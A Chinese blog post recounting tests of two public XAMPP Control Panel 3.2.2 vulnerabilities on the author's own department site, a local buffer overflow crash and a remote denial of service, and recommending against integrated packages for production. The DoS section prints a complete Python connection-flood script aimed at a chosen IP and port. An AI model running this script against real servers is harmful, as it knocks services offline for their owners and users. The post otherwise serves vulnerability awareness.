标签:文件 rcu get 问题 target error \n mys filezilla
最近在看通用漏洞,发现我们部门网站使用了xampp3.2.2做网站部署,于是在网上搜索xampp,还真找到两个漏洞。
一个是今年9月出的一个XAMPP Control Panel 3.2.2 Buffer Overflow;另一个是几年前的一个远程拒绝服务,发现竟然还能用(?_?)。
#0x01 XAMPP Control Panel 3.2.2 Buffer Overflow
网上共找到两种Poc:
http://www.vfocus.net/art/20181220/15036.html
http://www.vfocus.net/art/20180917/14798.html
下载运行脚本,会生成一个exploit.txt文件。
在Control Panel里点击右上角的config,将exlpoit里的内容复制到editor和browser里,保存。
然后点击查看httpd.conf文件,会弹出崩溃。
崩溃后web进程并没有中断,并没有达成拒绝服务,只是程序崩溃而已,貌似价值不高。
#0x02XAMPP Control Panel - Denial Of Service
找到一个poc:
https://www.anquanke.com/vul/id/1067740
大体意思就是在xampp监听的这些端口:
(MySQL) 3306 v3.2.2 (Tomcat) 8080 (XAMPP v3.1.0) (FileZilla) 21 (Mercury Mail) 25 (XAMPP v3.1.0),79,105,106,143.
如果发送大量的垃圾数据,就会造成内存崩溃和拒绝服务。
POC:
import socket print "XAMPP Control Panel DOS" print "Discovery: John Page (hyp3rlinx)" print "ApparitionSec" print "hyp3rlinx.altervista.org\r\n" IP = raw_input("[IP]> ") PORT = raw_input("[PORT]> ") arr=[] c=0 while 1: try: arr.append(socket.create_connection((IP,PORT))) arr[c].send("DOOM") print "Die!" c+=1 except socket.error: print "[+] Done! " raw_input() break
对xampp的80端口尝试攻击:
效果显著。中断脚本后,网站即可恢复。
想到其他建站工具也可能有这种问题,又拿脚本测了下phpstudy,同样可以实现拒绝服务。
#0x03
怪不得都说网站正式部署最好不要用这些集成工具包,一个是很容易由于默认配置遭到入侵,还有这种dos攻击。
标签:文件 rcu get 问题 target error \n mys filezilla
原文地址:https://www.cnblogs.com/apossin/p/10167920.html